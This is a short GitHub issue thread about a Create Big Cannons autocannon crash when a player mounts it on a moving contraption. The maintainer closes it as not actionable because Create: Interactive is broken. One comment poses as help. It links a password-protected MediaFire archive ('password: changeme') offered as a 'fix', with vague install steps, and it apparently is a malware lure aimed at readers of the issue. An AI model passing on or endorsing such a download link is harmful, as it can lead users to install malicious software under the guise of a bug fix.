### ISSUE TITLE
Compat issue with Create Interactive, Clockwork, VS, etc

### ISSUE THREAD

**Issue by CodySpirits1** [Cannoneers-of-Create/CreateBigCannons#648]
Create Big Cannons Autocannons that are set to be able to be mounted by players that are also on any kind of contraption (moving trains, physics objects, anything on a mechanical bearing, etc) will cause the game to crash if a player attempts to mount said autocannon. 

No crash report appears to be generated.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rbasamoyai** [comment]
Did you not check the crash-reports folder
Also, interactive is generally broken

**Comment by rbasamoyai** [comment]
Bump

**Comment by rbasamoyai** [comment]
Actually, deciding on closing this as not actionable as *Create: Interactive* is generally a broken mod. Sorry.
